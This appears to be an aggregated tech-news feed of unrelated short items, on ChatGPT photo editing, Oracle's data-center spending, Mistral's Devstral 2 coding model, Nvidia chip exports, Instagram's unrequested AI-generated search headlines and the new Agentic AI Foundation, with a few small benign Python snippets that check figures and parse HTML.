If ChatGPT's image manipulation gets good enough, then Photoshop is no longer going to be needed by a substantial number of users: ChatGPT can already remove people and objects from photos, for example, quite effectively. What it's not quite as good at is some of the basic adjustments (like colors and contrast) that Adobe software has been managing for years.

For quick, basic edits you want to type out in natural language—especially where you want to adjust the edits manually and need advice on what to do next—Photoshop inside ChatGPT is a handy tool to be able to turn to, especially as it's free. For serious edits, though, you're still going to want to fire up the main Photoshop app, or maybe even shun Adobe altogether and make use of ChatGPT's steadily improving editing tools.

Oracle stock dropped after it reported disappointing revenues on Wednesday alongside a $15 billion increase in its planned spending on data centers this year to serve artificial intelligence groups.

Shares in Larry Ellison’s database company fell 11 percent in pre-market trading on Thursday after it reported revenues of $16.1 billion in the last quarter, up 14 percent from the previous year, but below analysts’ estimates.

Oracle raised its forecast for capital expenditure this financial year by more than 40 percent to $50 billion. The outlay, largely directed to building data centers, climbed to $12 billion in the quarter, above expectations of $8.4 billion.
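
The spending figures in this report can be cross-checked with simple arithmetic. The sketch below assumes the "$15 billion increase" and the "$50 billion" forecast describe the same capital expenditure plan, which the report implies but does not state outright. The variable names are illustrative.

```python
# Full-year capital expenditure forecast, in billions of dollars.
new_forecast_bn = 50
increase_bn = 15
previous_forecast_bn = new_forecast_bn - increase_bn
forecast_rise_pct = 100 * increase_bn / previous_forecast_bn

# Quarterly outlay versus what analysts expected, in billions of dollars.
quarter_capex_bn = 12.0
quarter_expected_bn = 8.4
quarter_overshoot_pct = 100 * (quarter_capex_bn - quarter_expected_bn) / quarter_expected_bn

print(f"previous forecast: ${previous_forecast_bn} billion")
print(f"forecast raised by {forecast_rise_pct:.1f} percent")
print(f"quarterly capex above expectations by {quarter_overshoot_pct:.1f} percent")
```

Under that assumption the previous forecast works out to $35 billion, and a $15 billion rise on that base is consistent with the "more than 40 percent" in the report.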

© Mesut Dogan

Are Non-Human Identities (NHIs) the Missing Link in Your Cloud Security Strategy? Where technology is reshaping industries, the concept of Non-Human Identities (NHIs) has emerged as a critical component in cloud-native security strategies. But what exactly are NHIs, and why are they essential in achieving security assurance? Decoding Non-Human Identities in Cybersecurity The term Non-Human […]

The post How to feel assured about cloud-native security with AI? appeared first on Entro.

The post How to feel assured about cloud-native security with AI? appeared first on Security Boulevard.

Can Agentic AI Revolutionize Cybersecurity Practices? Where digital threats consistently challenge organizations, how can cybersecurity teams leverage innovations to bolster their defenses? Enter the concept of Agentic AI—a technology that could serve as a powerful ally in the ongoing battle against cyber threats. By enhancing the management of Non-Human Identities (NHIs) and secrets security management, […]

The post How does Agentic AI empower cybersecurity teams? appeared first on Entro.

The post How does Agentic AI empower cybersecurity teams? appeared first on Security Boulevard.

On Tuesday, French AI startup Mistral AI released Devstral 2, a 123 billion parameter open-weights coding model designed to work as part of an autonomous software engineering agent. The model achieves a 72.2 percent score on SWE-bench Verified, a benchmark that attempts to test whether AI systems can solve real GitHub issues, putting it among the top-performing open-weights models.

Perhaps more notably, Mistral didn’t just release an AI model, it released a new development app called Mistral Vibe. It’s a command line interface (CLI) similar to Claude Code, OpenAI Codex, and Gemini CLI that lets developers interact with the Devstral models directly in their terminal. The tool can scan file structures and Git status to maintain context across an entire project, make changes across multiple files, and execute shell commands autonomously. Mistral released the CLI under the Apache 2.0 license.

It’s always wise to take AI benchmarks with a large grain of salt, but we’ve heard from employees of the big AI companies that they pay very close attention to how well models do on SWE-bench Verified, which presents AI models with 500 real software engineering problems pulled from GitHub issues in popular Python repositories. The AI must read the issue description, navigate the codebase, and generate a working patch that passes unit tests. While some AI researchers have noted that around 90 percent of the tasks in the benchmark test relatively simple bug fixes that experienced engineers could complete in under an hour, it’s one of the few standardized ways to compare coding models.
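
To put those percentages in terms of task counts, here is a rough conversion. It assumes the reported score is a plain fraction of the benchmark's 500 problems. The helper name is illustrative and is not part of any SWE-bench tooling.

```python
TOTAL_TASKS = 500  # problems in SWE-bench Verified, per the article


def tasks_from_percent(percent: float, total: int = TOTAL_TASKS) -> int:
    """Convert a percentage of the benchmark into a whole number of tasks."""
    return round(total * percent / 100)


solved = tasks_from_percent(72.2)  # Devstral 2's reported score
simple = tasks_from_percent(90)    # share described as relatively simple bug fixes

print(f"tasks solved: {solved} of {TOTAL_TASKS}")
print(f"tasks described as simple fixes: about {simple}")
```

The article does not say how much the solved set overlaps with the simpler tasks, so the two counts should not be subtracted from one another.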

© Mistral / Benj Edwards

The U.S. National Institute of Standards and Technology (NIST) is building a taxonomy of attacks and mitigations for securing artificial intelligence (AI) agents. Speaking at the AI Summit New York conference, Apostol Vassilev, a research team supervisor for NIST, told attendees that the arm of the U.S. Department of Commerce is working with industry partners..

The post NIST Plans to Build Threat and Mitigation Taxonomy for AI Agents appeared first on Security Boulevard.

Donald Trump’s decision to allow Nvidia to export an advanced artificial intelligence chip, the H200, to China may give China exactly what it needs to win the AI race, experts and lawmakers have warned.

The H200 is about 10 times less powerful than Nvidia’s Blackwell chip, which is the tech giant’s currently most advanced chip that cannot be exported to China. But the H200 is six times more powerful than the H20, the most advanced chip available in China today. Meanwhile China’s leading AI chip maker, Huawei, is estimated to be about two years behind Nvidia’s technology. By approving the sales, Trump may unwittingly be helping Chinese chip makers “catch up” to Nvidia, Jake Sullivan told The New York Times.

Sullivan, a former Biden-era national security advisor who helped design AI chip export curbs on China, told the NYT that Trump’s move was “nuts” because “China’s main problem” in the AI race “is they don’t have enough advanced computing capability.”

© Andrew Harnik / Staff | Getty Images News

The cybersecurity world loves a simple solution to a complex problem, and Gartner delivered exactly that with its recent advisory: “Block all AI browsers for the foreseeable future.” The esteemed analyst firm warns that agentic browsers—tools like Perplexity’s Comet and OpenAI’s ChatGPT Atlas—pose too much risk for corporate use. While their caution makes sense given..

The post Gartner’s AI Browser Ban: Rearranging Deck Chairs on the Titanic appeared first on Security Boulevard.

Model Context Protocol (MCP) is quickly becoming the backbone of how AI agents interact with the outside world. It gives agents a standardized way to discover tools, trigger actions, and pull data. MCP dramatically simplifies integration work. In short, MCP servers act as the adapter that grants access to services, manages credentials and permissions, and..

The post Securing MCP: How to Build Trustworthy Agent Integrations appeared first on Security Boulevard.

OWASP unveils its GenAI Top 10 threats for agentic AI, plus new security and governance guides, risk maps, and a FinBot CTF tool to help organizations secure emerging AI agents.

The post OWASP Project Publishes List of Top Ten AI Agent Threats appeared first on Security Boulevard.

The FBI is warning of AI-assisted fake kidnapping scams:

Criminal actors typically will contact their victims through text message claiming they have kidnapped their loved one and demand a ransom be paid for their release. Oftentimes, the criminal actor will express significant claims of violence towards the loved one if the ransom is not paid immediately. The criminal actor will then send what appears to be a genuine photo or video of the victim’s loved one, which upon close inspection often reveals inaccuracies when compared to confirmed photos of the loved one. Examples of these inaccuracies include missing tattoos or scars and inaccurate body proportions. Criminal actors will sometimes purposefully send these photos using timed message features to limit the amount of time victims have to analyze the images.

Images, videos, audio: It can all be faked with AI. My guess is that this scam has a low probability of success, so criminals will be figuring out how to automate it.

Few of us are under the illusion that we own the content that we post on Instagram, but we do get a say in how that content is presented—we can choose which photos and videos we share, what captions appear (or don't appear) on each post, as well as whether or not we include where the image was taken or shared from. We might not control the platform, but we can control the content of our posts—unless those posts are found on search engines like Google.

As reported by 404 Media, Instagram is now experimenting with AI-generated SEO titles for users' posts—without those users' input or permission. Take this post for example: Author Jeff VanderMeer uploaded a short video of rabbits eating a banana to his Instagram. The video was posted as-is: There was no caption, location tag, or any other public-facing information. It's just a couple of rabbits having a bite.

Instagram, however, took it upon itself to add a headline to the post, at least when you stumble upon it via Google. Rather than display a link featuring Jeff's Instagram handle and some metadata about the video, the Google entry comes back with the following headline: "Meet the Bunny Who Loves Eating Bananas, A Nutritious Snack for..." (the rest of the headline cuts off here).

VanderMeer was less than pleased with the discovery. He posted a screenshot of the headline to Bluesky, writing, "now [Instagram] appears to generate titles [and] headlines via AI for stuff I post...to create [clickbait] for [Google] wtf do not like."

This was not the only AI-generated headline VanderMeer was roped into. This post from the Groton Public Library in Massachusetts, which advertises VanderMeer's novel Annihilation as the library's December book group pick, was also given the clickbait treatment on Google. Just as with VanderMeer's post, the Groton Public Library didn't include any text in its Instagram post—just an image showing off the book. But if you see the post within a Google search, you'll see the following partial headline: "Join Jeff VanderMeer on a Thrilling Beachside Adventure..."

404 Media's Emanuel Maiberg says that they've confirmed that Instagram is also generating headlines for other users on the platform, all without permission or knowledge. Google told Maiberg the headlines are not coming from its AI generators—though it has been using deceptive AI-generated headlines of its own on Google Discover. In fact, the company says its search engine is simply pulling the text from Instagram itself. Maiberg found that these headlines do appear under title tags for Instagram posts when using Google's Rich Result Test tool. When digging through the code, Maiberg also discovered AI-generated descriptions for each post, which could be what Instagram is ultimately using to generate the headlines.
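
If you want to see what a search engine would read from a page's title tag and meta description, a few lines of Python can pull both out of the HTML. This is a minimal sketch using the standard library's `html.parser`. The sample markup is hypothetical and is not copied from Instagram, and whether Instagram stores its generated descriptions in a meta description tag is an assumption made for illustration.

```python
from html.parser import HTMLParser


class TitleAndDescription(HTMLParser):
    """Collect the <title> text and the meta description from an HTML page."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.description = None
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "meta" and attributes.get("name") == "description":
            self.description = attributes.get("content")

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        # Only text that appears between <title> and </title> is kept.
        if self._in_title:
            self.title += data


# Hypothetical markup for illustration only.
SAMPLE_HTML = """<html><head>
<title>Example generated headline</title>
<meta name="description" content="Example generated description of the post.">
</head><body></body></html>"""

parser = TitleAndDescription()
parser.feed(SAMPLE_HTML)
print(parser.title)
print(parser.description)
```

To check a real post, you would save the page source from your browser and pass that text to `feed()` in place of the sample string.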

I reached out to Meta for comment, and this story originally published before they responded. However, a Meta spokesperson has since confirmed to me that Instagram has recently started generating these titles using AI. The goal, according to the spokesperson, is to make it easier to know what a post is about before you click the link. They also noted that these headlines might not be totally correct, as with all AI products. In addition, the spokesperson explained that search engine optimization indexing is not necessarily new. The company has been doing this for years in the U.S. to increase visibility for posts from professional accounts.

That last point is all fine and good, of course. No one is surprised that Instagram is indexing posts for search engines: Most social media platforms do that. Otherwise, you'd never find any of their posts on platforms like Google. The issue is generating fake headlines with AI without letting anyone know about it. Just because Meta AI is capable of generating headlines doesn't mean it is good at it, or even that it should—especially when users never consented to this practice in the first place. It'd be one thing if Instagram had an option before you post—something like "Generate a headline for me using Meta AI that will appear in search engines for my post." Most of us would opt out of that, but it'd at least be a choice. However, it appears that Instagram decided that users like VanderMeer weren't capable of writing a headline as clever as "Meet the Bunny Who Loves Eating Bananas."

The worst part is, the AI doesn't even accurately describe the posts, a risk the Meta spokesperson readily admits to. That Groton Public Library post was only about a book club meeting featuring VanderMeer's novel, but the headline says "Join Jeff VanderMeer," as if he'd be making an appearance. Not only did Instagram add a headline without VanderMeer's consent, it spread misinformation about his whereabouts. And for what? Some extra engagement on Google?

If Instagram wants its posts to appear as headlines on search engines, it should include the actual posters in the conversation. As VanderMeer told 404 Media: "If I post content, I want to be the one contextualizing it, not some third party."

While Meta has yet to add a dedicated on/off switch for these headlines, one thing you can do to ensure your posts don't get an AI clickbait makeover is to opt out of indexing as a whole. If you run an account that relies on discoverability, this might not be worth it, since you'll be impacting how users find your posts outside of Instagram. However, if you don't care about that, or you don't need the SEO at all, you can stop Instagram from making your posts available on search engines and put an end to the AI-generated headlines at the same time.

There are three ways to accomplish this, according to Instagram:

Make your account private: Head to Instagram's in-app settings, then choose Account privacy. Here, tap the Private account toggle.

Switch your account from professional to personal: Open Instagram's in-app settings, scroll down and tap Account type and tools. Here, choose "Switch to personal account."

Manually opt out of indexing: Head to Instagram's in-app settings, then choose Account privacy. You should see an option to stop your public photos and videos from appearing in search engines.

Big Tech has spent the past year telling us we’re living in the era of AI agents, but most of what we’ve been promised is still theoretical. As companies race to turn fantasy into reality, they’ve developed a collection of tools to guide the development of generative AI. A cadre of major players in the AI race, including Anthropic, Block, and OpenAI, has come together to promote interoperability with the newly formed Agentic AI Foundation (AAIF). This move elevates a handful of popular technologies and could make them a de facto standard for AI development going forward.

The development path for agentic AI models is cloudy to say the least, but companies have invested so heavily in creating these systems that some tools have percolated to the surface. The AAIF, which is part of the nonprofit Linux Foundation, has been launched to govern the development of three key AI technologies: Model Context Protocol (MCP), goose, and AGENTS.md.

MCP is probably the most well-known of the trio, having been open-sourced by Anthropic a year ago. The goal of MCP is to link AI agents to data sources in a standardized way—Anthropic (and now the AAIF) is fond of calling MCP a “USB-C port for AI.” Rather than creating custom integrations for every different database or cloud storage platform, MCP allows developers to quickly and easily connect to any MCP-compliant server.
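
To give a sense of what "standardized" means in practice, MCP messages are JSON-RPC 2.0 requests, and the protocol defines methods such as `tools/list` and `tools/call`. The sketch below only builds the request payloads and does not open a connection. The tool name `search_files` and its arguments are hypothetical, and a real session would start with an initialization handshake that is left out here.

```python
import json
from itertools import count
from typing import Optional

_request_ids = count(1)  # JSON-RPC requests carry an id so replies can be matched


def jsonrpc_request(method: str, params: Optional[dict] = None) -> str:
    """Serialize a JSON-RPC 2.0 request of the kind an MCP client sends."""
    message = {"jsonrpc": "2.0", "id": next(_request_ids), "method": method}
    if params is not None:
        message["params"] = params
    return json.dumps(message)


# Ask the server which tools it offers.
list_tools = jsonrpc_request("tools/list")

# Invoke one tool by name. "search_files" is a made-up tool for illustration.
call_tool = jsonrpc_request(
    "tools/call",
    {"name": "search_files", "arguments": {"query": "invoice"}},
)

print(list_tools)
print(call_tool)
```

Because every compliant server accepts the same message shapes, a client written once can talk to a database connector or a cloud storage connector without a custom integration for each.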

© Getty Images

Nearly a decade after Pebble’s nascent smartwatch empire crumbled, the brand is staging a comeback with new wearables. The Pebble Core Duo 2 and Core Time 2 are a natural evolution of the company’s low-power smartwatch designs, but its next wearable is something different. The Index 01 is a ring, but you probably shouldn’t call it a smart ring. The Index does just one thing—capture voice notes—but the firm says it does that one thing extremely well.

Most of today’s smart rings offer users the ability to track health stats, along with various minor smartphone integrations. With all the sensors and data collection, these devices can cost as much as a smartwatch and require frequent charging. The Index 01 doesn’t do any of that. It contains a Bluetooth radio, a microphone, a hearing aid battery, and a physical button. You press the button, record your note, and that’s it. The company says the Index 01 will run for years on a charge and will cost just $75 during the preorder period. After that, it will go up to $99.

Core Devices, the new home of Pebble, says the Index is designed to be worn on your index finger (get it?), where you can easily mash the device’s button with your thumb. Unlike recording notes with a phone or smartwatch, you don’t need both hands to create voice notes with the Index.

© Core Devices

When it comes to cybersecurity, it often seems the best prevention is to follow a litany of security “do’s” and “don’ts.” A former colleague once recalled that at one organization where he worked, this approach led to such a long list of guidance that the cybersecurity function was playfully referred to as a famous James..

The post Rebrand Cybersecurity from “Dr. No” to “Let’s Go” appeared first on Security Boulevard.

At a recent Tech Field Day Exclusive event, Microsoft unveiled a significant evolution of its security operations strategy—one that attempts to solve a problem plaguing security teams everywhere: the exhausting practice of jumping between multiple consoles just to understand a single attack. The Problem: Too Many Windows, Not Enough Clarity Security analysts have a name..

The post Microsoft Takes Aim at “Swivel-Chair Security” with Defender Portal Overhaul appeared first on Security Boulevard.